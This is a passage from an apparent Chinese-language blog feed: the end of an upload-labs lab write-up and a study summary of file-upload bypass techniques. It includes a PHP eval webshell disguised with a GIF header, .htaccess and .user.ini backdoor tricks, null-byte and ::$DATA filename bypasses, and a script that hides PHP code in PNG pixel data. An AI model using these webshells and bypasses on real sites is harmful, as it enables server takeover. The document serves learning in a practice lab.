发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。也就是我们成功上传了php文件但后端在短时间内将其删除了,所以我们要抢到在它删除之前访问文件,就如我们打开文件的时候去删除它,会提示文件文件已打开一样,这样从而防止文件被删除。</p><p> 利用bp不断发送,同时使用浏览器不断访问该文件(用原名就行),就有机会连上</p><p><img src="/2022/07/18/upload-labs/fa98d15bffbee59563ab79c835eee62c.png" alt="截图"></p><p> 蚁剑也能利用这个方法不断点击连入,不过实际后门文件还是会被删除不存在,这样的连接不稳定</p><p><img src="/2022/07/18/upload-labs/ced92528861948eaa19362ddc7fe6a13.png" alt="截图"></p><br><h3 id="pass-18:"><a href="#pass-18:" class="headerlink" title="pass 18:"></a>pass 18:</h3><p><img src="/2022/07/18/upload-labs/42cc5e1b2f94bf71821372b2cfa2b27c.png" alt="截图"></p><p> 之前的图片马依旧直接连入</p><p> 最普通的图片马也可以绕过,没有做二次渲染(看代码也可以知道)</p><p><img src="/2022/07/18/upload-labs/bd35a3d95484261ba246f327dcca63db.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/2e75f3d32e52049e2ec46e455a640cbe.png" alt="截图"></p><p> 这关其实是多做了白名单筛选以及图片的检查大小,存在之类的后上传改名。根据每一步验证,失败后返回对应的详细报错。上传前验证避免我们用条件竞争一直访问上传的php,可以考虑条件竞争访问上传的一些图片马去访问防止改名或者一开始直接上图片马</p><p> 条件竞争版进入</p><p><img src="/2022/07/18/upload-labs/e5abacb1b3873051088e05c1b4050368.png" alt="截图"></p><p> 成功</p><p><img src="/2022/07/18/upload-labs/9daa741828b9afbd1e834a1aae3eebb2.png" alt="截图"></p><p><img src="/2022/07/18/upload-labs/4b948daf3ff66fc0b239064ca9335776.png" alt="截图"></p><h3 id="pass-19:"><a href="#pass-19:" class="headerlink" title="pass 19:"></a>pass 19:</h3><p> 源码:</p><p><img src="/2022/07/18/upload-labs/1f49e9ff25efc707339774cd5a9b4fed.png" alt="截图"></p><p> 上传的文件名用post传输,规定的黑名单只是对post上传的文件名进行简单后缀名验证,什么.空格之类的验证过滤都没有</p><p> 直接修改保存名称这个框进行绕过或者bp和它对应的save name这一表单元素修改一下就行</p><p><img src="/2022/07/18/upload-labs/c9b43ef7ff83f194f8c40fead649b255.png" alt="截图"></p><p> 成功</p><p><img src="/2022/07/18/upload-labs/78159f7563ca50ae92fa779de8c7267a.png" alt="截图"></p><p>参考链接:<a href="https://blog.csdn.net/qq_50673174/article/details/124760011">https://blog.csdn.net/qq_50673174/article/details/124760011</a></p><p><a href="https://blog.csdn.net/weixin_45588247/article/details/119177948">https://blog.csdn.net/weixin_45588247/article/details/119177948</a></p>]]></content>
<summary type="html"><p>文件上传靶场upload-labs wp</p></summary>
<category term="wp" scheme="http://example.com/tags/wp/"/>
<category term="upload-labs" scheme="http://example.com/tags/upload-labs/"/>
</entry>
<entry>
<title>文件上传笔记</title>
<link href="http://example.com/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<id>http://example.com/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</id>
<published>2022-07-18T15:05:58.000Z</published>
<updated>2022-12-31T16:59:52.475Z</updated>
<content type="html"><![CDATA[<p>做完文件上传靶场upload-labs题目后,进行的一些归纳总结</p><span id="more"></span><p>最近一周刷完了upload-labs,简单总结一下我学到的一些文件上传绕过姿势</p><p><strong>思维导图</strong></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220725222936354.png" alt="image-20220725222936354"></p><h3 id="一,绕过"><a href="#一,绕过" class="headerlink" title="一,绕过"></a>一,绕过</h3><h4 id="1-js验证"><a href="#1-js验证" class="headerlink" title="1.js验证"></a>1.js验证</h4><p> js就是我们熟知的JavaScript,一般运行在客户端,node.js才是运行在服务端的。<br> 看到有句话说的好,一切前端js验证都是纸老虎。</p><p>绕过很简单:</p><p>1.他是运行在你的客户端的,我们可以关闭本地js,比如用bp(burpsuite)就可以自动去除js。不过一般前端验证成功后才发送数据包让bp截取,也可以直接浏览器禁止掉js运行</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717180604210.png" alt="image-20220717180604210"></p><p>2.f12进开发者页面可以直接看js代码并且可以修改,删除验证比添加文件类型好用点,添加完要刷新重新运行一遍</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717182638793.png" alt="image-20220717182638793"></p><h4 id="2-MIME类型验证"><a href="#2-MIME类型验证" class="headerlink" title="2.MIME类型验证"></a>2.MIME类型验证</h4><p> 主要进行验证的代码类似以下这句:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717183028164.png" alt="image-20220717183028164"></p><p> 关于php的files数组一些前置知识,很常用</p><blockquote><p>$_FILES数组内容如下:</p><p>< input type=”file” name=”userfile” ></p><p>$_FILES[‘userfile’][‘name’] 客户端文件原称。</p><p>$_FILES[‘userfile’][‘type’] <strong>文件的 MIME 类型</strong>,需要浏览器提供该信息的支持,例如“image/gif”。</p><p>$_FILES[‘userfile’][‘size’] 已上传文件大小,单位字节(Byte)。</p><p>$_FILES[‘userfile’][‘tmp_name’] 文件上传后在服务端储存的临时文件名。</p><p>$_FILES[‘userfile’][‘error’] 和该文件上传相关的错误代码。[‘error’] 是在 PHP 4.2.0 版本中增加的。<br>注: 在 PHP 4.1.0 版本以前该数组的名称为 $HTTP_POST_FILES,它并不像 $_FILES 一样是自动全局变量。PHP 3 不支持 $HTTP_POST_FILES 数组。</p></blockquote><blockquote><p>move_uploaded_file – 将上传的文件移动到新位置<br>说明:<br>bool move_uploaded_file ( string filename, string destination )<br>本函数检查并确保由 filename 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST 上传机制所上传的)。如果文件合法,则将其移动为由 destination 指定的文件。</p><p>如果 filename 不是合法的上传文件,不会出现任何操作,move_uploaded_file() 将返回 FALSE。</p><p>如果 filename 是合法的上传文件,但出于某些原因无法移动,不会出现任何操作,move_uploaded_file() 将返回 FALSE。此外还会发出一条警告。</p><p>这种检查显得格外重要,如果上传的文件有可能会造成对用户或本系统的其他用户显示其内容的话</p></blockquote><p> 绕过很简单了,数据包修改content-type块,可以改为image/jpeg</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717183752584.png" alt="image-20220717183752584"></p><h4 id="3-拓展名绕过"><a href="#3-拓展名绕过" class="headerlink" title="3.拓展名绕过"></a>3.拓展名绕过</h4><p> exif_imagetype函数功能是读取一个图像的第一个字节并检查其签名</p><p> 主要是针对使用黑名单但是没有禁用完后缀名的</p><p> 一些文件后缀名的拓展名比如phtml依旧解析为php</p><p> 简单举例但是不全:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717184218012.png" alt="image-20220717184218012"></p><p>pht也是</p><h5 id="htaccess文件"><a href="#htaccess文件" class="headerlink" title=".htaccess文件"></a>.htaccess文件</h5><p> <strong>.htaccess是针对apache的</strong></p><p> 或者没有过滤掉.htaccess文件</p><p> .htaccess文件( 全称 “分布式配置文件” ),英文全称 Hypertext Access (超文本入口)。提供了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。</p><p>简单来说他是apache的配置文件,满足”</p><p>1.Allow Override All;</p><p>2.LoadModule rewrite_module modules/mod_rewrite.so #rewrite模块为开启状态。</p><p>“两个条件后可以上传.hataccess文件修改配置</p><p>注意:</p><p>注意php的版本,nts 意思是即非线程安全,不提供数据访问保护,不支持使用 .htaccess</p><p>需要配置apache</p><p>httpd.conf</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717184717759.png" alt="image-20220717184717759"></p><p>.htaccess文件内容</p><p><code>AddType application/x-httpd-php .jpg</code> </p><p> 把jpg文件当作php文件解析,不加.jpg就是把所有文件当php文件解析</p><p> 上传.htaccess后我们把shell.php改个后缀(这里为.jpg)上传就行了</p><h5 id="user-ini(后续精炼一下)"><a href="#user-ini(后续精炼一下)" class="headerlink" title=".user.ini(后续精炼一下)"></a>.user.ini(后续精炼一下)</h5><p>应用相比于<code>.htaccess</code>用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。</p><p>php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:<code>PHP_INI_SYSTEM</code>、<code>PHP_INI_PERDIR</code>、<code>PHP_INI_ALL</code>、<code>PHP_INI_USER</code>。</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/2014103002272568560.png" alt="enter image description here"></p><p>除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录(<code>$_SERVER['DOCUMENT_ROOT']</code> 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。</p><p>在 <code>.user.ini</code> 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。</p><p>这里就很清楚了,<code>.user.ini</code>实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)</p><p>实际上,除了<code>PHP_INI_SYSTEM</code>以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。</p><p>而且,和<code>php.ini</code>不同的是,<code>.user.ini</code>是一个能被动态加载的ini文件。也就是说我修改了<code>.user.ini</code>后,不需要重启服务器中间件,只需要等待<code>user_ini.cache_ttl</code>所设置的时间(默认为300秒),即可被重新加载。</p><p>然后我们看到php.ini中的配置项,可惜我沮丧地发现,只要稍微敏感的配置项,都是<code>PHP_INI_SYSTEM</code>模式的(甚至是php.ini only的),包括<code>disable_functions</code>、<code>extension_dir</code>、<code>enable_dl</code>等。 不过,我们可以很容易地借助<code>.user.ini</code>文件来构造一个“后门”。</p><p>指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=01.gif</span><br></pre></td></tr></table></figure><p>原因: .user.ini中auto prepend_file=xxx.jpg会在执行index.php前把xxx.jpg包含进来,且解析为php格式</p><p>那么,我们可以猥琐地想一下,在哪些情况下可以用到这个姿势? 比如,某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。</p><h4 id="4-验证机制绕过"><a href="#4-验证机制绕过" class="headerlink" title="4.验证机制绕过"></a>4.验证机制绕过</h4><p> 最简单就是对于文件名一些特殊符号过滤不全</p><p> 比较全的过滤代码如下:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717190812860.png" alt="image-20220717190812860"></p><p> trim() 函数移除字符串两侧的空白字符或其他预定义字符。</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717190918400.png" alt="image-20220717190918400"></p><p> 去掉整个文件名尾部的点(shell.php.加点(dot,.)绕过)</p><p> strrchr找到.之后的字符串,即后缀名</p><p> 之后则是对后缀名过滤,比如同一转换为小写(大小写绕过,shell.PHP);去除字符串::$_DATA(伪装为文件流绕过,shell.php::$DATA);空格绕过</p><p>注意:. and 空格本地直接改后缀会直接忽略,用bp改数据包</p><p><strong>总结:1.加点(.);2.加空格;3.大小写;4.::$_DATA</strong></p><p>原理:</p><p>1.windows创建文件时会对点(.),空格,以及大小写忽略,导致可以绕过黑名单比较但是创建的文件是正常的后门文件。</p><p>2.在window的时候如果文件名+”::$DATA”会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名</p><p> 验证机制不全可以针对没有的绕过,齐全则对于一次验证这个点进行代码逻辑层面绕过</p><p> 比如shell.php. . 去一次点再去空格剩下的shell.php.依旧可以绕过黑名单验证</p><p> 也可以是shell.php::::$DATA$DATA(双写绕过)</p><p> 遇到直接删除文件名的后缀名(后缀名在黑名单里)</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717193232330.png" alt="image-20220717193232330"></p><p> 可以双写绕过,比如.pphphtml</p><h4 id="5-上传路径可控"><a href="#5-上传路径可控" class="headerlink" title="5.上传路径可控"></a>5.上传路径可控</h4><p> 不管上传路径使用get方式还是post方式,我们都可以用%00截断字符串方式控制上传路径,这样上传文件后不会被改名(其实改名了要是能下载或者页面有记载,能看到改名后的文件名)</p><p> get方式直接改url,post改数据包里的路径文本信息或者hex值都行</p><p> 还有一点%00是要经过url编码的,post方式改数据包信息时如果不是url路径要进行编码</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194656166.png" alt="image-20220717194656166"></p><p> 也可以直接改hex,+代表空格(%2b),这里用来标记%00的位置</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194728843.png" alt="image-20220717194728843"></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194013902.png" alt="image-20220717194013902"></p><p> 比如save_path被修改为upload/1.php%00,应该是把1.php当文件夹,把文件重命名后上传到这个文件夹中</p><p> 但被截断读取后就实现了上传路径img_path为upload/1.php,把文件上传到upload文件夹,命名为1.php</p><p> 注意:PHP版本得小于5.3版本才能用这个%00截断get请求里的字符串,而且配置文件php.ini的magic_quotes_gpc为OFF状态</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194445837.png" alt="image-20220717194445837"></p><blockquote><p>一些常见的特殊符号的url编码</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194849735.png" alt="image-20220717194849735"></p></blockquote><h4 id="6-文件名可控"><a href="#6-文件名可控" class="headerlink" title="6.文件名可控"></a>6.文件名可控</h4><p> upload-labs pass19只是对另存的文件名验证,我们只要对保存名称进行一定绕过即可。</p><p> 主要还是用拓展名和验证机制绕过两者结合使用</p><h4 id="7-其他验证机制"><a href="#7-其他验证机制" class="headerlink" title="7.其他验证机制"></a>7.其他验证机制</h4><p> //习惯在文件前加上GIF89a来绕过PHP getimagesize的检查</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//phtml格式的一句话木马,phtml就是在html里插入php</span><br><span class="line">GIF89a</span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">language</span>=<span class="string">'php'</span>></span><span class="language-javascript">@<span class="built_in">eval</span>($_POST[shell]);</span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">language</span>=<span class="string">'php'</span>></span><span class="language-javascript"><span class="title function_">system</span>(<span class="string">'cat /flag'</span>);</span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure><p>以及<strong>如果过滤了文件中的字符,可以考虑使用phtml</strong>(html插入php)</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20221109160912453.png" alt="image-20221109160912453"></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20221109160926617.png" alt="image-20221109160926617"></p><p>蚁剑还是菜刀有时连接不上可能是连接校园网的问题,同样的连接使用手机热点就可以</p><h3 id="二,图片马"><a href="#二,图片马" class="headerlink" title="二,图片马"></a>二,图片马</h3><p> 图片马需要配合文件包含漏洞使用,文件包含漏洞能把图片当作php来解析以运行图片中暗藏的恶意php代码</p><p> php.ini配置</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200253108.png" alt="image-20220717200253108"></p><p> include文件包含漏洞文件代码:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717195441481.png" alt="image-20220717195441481"></p><p> 连入方式类似如下:</p><p> <a href="http://127.0.0.1/upload-labs/include.php?file=./upload/2.jpg">http://127.0.0.1/upload-labs/include.php?file=./upload/2.jpg</a></p><p> 使用文件包含漏洞时 PHP 版本改到PHP5.3及以上</p><h4 id="1-最普通制作"><a href="#1-最普通制作" class="headerlink" title="1.最普通制作"></a>1.最普通制作</h4><ul><li><p>可以用winhex,010editor之类的直接在文件末尾插入php代码</p></li><li><p>利用cmd中 copy 111.jpg/b+shell.php/a 3333.jpg</p><p>(建议php放后面,代码插入位置为末尾,一般的验证方式都会检查前面文件头)</p></li></ul><blockquote><p>/b代表使用二进制形式打开</p><p>/a代表使用ascii方式打开(默认)</p></blockquote><p> 制作完成果:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200144750.png" alt="image-20220717200144750"></p><p><strong>可以绕过:</strong></p><p>1.只读开头两个字节</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200635334.png" alt="image-20220717200635334"></p><p>2.getimagesize()</p><p> 这个函数功能会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的</p><p>3.exif_imagetype()</p><p> 检查一张图片的真实格式,防止改个后缀名蒙混过关</p><p> 需要配置php exif模块(自己百度)</p><h4 id="2-绕过二次渲染(待补充)"><a href="#2-绕过二次渲染(待补充)" class="headerlink" title="2.绕过二次渲染(待补充)"></a>2.绕过二次渲染(待补充)</h4><p> 服务端二次渲染代码:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717202109699.png" alt="image-20220717202109699"></p><p> 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。</p><p> 前面制作的图片马末尾的php代码会直接被渲染掉,需要重新制作</p><p> 对于不同图片格式需要不同的制作方式</p><p> gif最简单,比对上传的源图片和下载下来的图片,在不变的位置插入php代码,多尝试几次,可能会失败</p><p> png相对复杂,两种方法,写到PLTE or IDAT</p><p> 脚本的编写要对于png文件格式信息更多了解,后面学习了再来补充,使用现成脚本先处理</p><ul><li><p>PLTE(需要索引彩色图像)</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717215839769.png" alt="image-20220717215839769"></p><p> 主要是要用脚本计算出插入php代码后的crc值并手动替换</p></li><li><p>IDAT</p><p>使用现成脚本生成带有特定代码的png图片</p><p>脚本(php.ini配置开启拓展的gd2库):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0x0e</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./aba.png'</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></li></ul><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220623470.png" alt="image-20220717220623470"></p><p> 生成一张黑乎乎的图片<img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220549961.png" alt="image-20220717220549961"></p><p> 带有特定的php代码(不知道怎么改):</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220711079.png" alt="image-20220717220711079"></p><p> jpg</p><p> jpg也是利用脚本处理</p><p> 由于jpg图片易损,对图片的选取有很大关系,很容易制作失败,需要多选取几张图片进行生成。</p><p> 可以写入phpinfo,不知道为什么一句话木马写进去制作时报错,好像是和引号有关</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span 